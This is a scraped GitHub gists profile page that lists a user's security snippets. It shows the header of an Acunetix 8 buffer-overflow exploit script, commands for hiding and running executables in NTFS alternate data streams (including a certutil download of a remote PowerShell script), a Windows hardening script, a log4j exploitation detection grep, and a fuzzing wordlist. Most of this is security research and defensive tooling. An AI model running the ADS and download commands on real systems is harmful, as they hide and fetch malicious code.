I hereby claim:
- I am oakkaya on github.
- I am oakkaya (https://keybase.io/oakkaya) on keybase.
- I have a public key ASD9Ka-TEHs7JWWNYEGs142dyXNrI0J3JmxNrXyvwmrzpAo
To claim this, I am signing this object:
Oğuzhan Akkaya oakkaya
🪁
oakkaya
/ Acunetix8.py
Created
June 9, 2014 00:41
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit | |
| # Version: 8 | |
| # Build: 20120704 | |
| # Tested on: Windows XP SP2 en //Shellcode working on Xp and Linux x86 and x64,not working w7 or w8.You'll use different buf with head + junk mechanism to w7 or w8 system ! | |
| # Vendor: http://www.acunetix.com/ | |
| # Exploit Rebuild: Oğuzhan Akkaya. | |
| # @Smashthekernel | |
| # Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html | |
| # /!\ Author is not responsible for any damage you cause |
oakkaya
/ keybase.md
Created
August 30, 2016 12:38
oakkaya
/ Exe_ADS_Methods.md
Created
October 26, 2021 12:22
— forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
oakkaya
/ windows_hardening.cmd
Created
October 26, 2021 13:12
— forked from api0cradle/windows_hardening.cmd
Script to perform some hardening of Windows OS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: | |
| ::####################################################################### | |
| :: | |
| :: Change file associations to protect against common ransomware attacks | |
| :: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
| :: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
| :: --------------------- | |
| ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
| ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
oakkaya
/ log4j_rce_detection.md
Created
December 11, 2021 00:53
— forked from Neo23x0/log4j_rce_detection.md
Log4j RCE CVE-2021-44228 Exploitation Detection
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
oakkaya
/ List of API endpoints & objects
Created
May 23, 2023 17:08
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |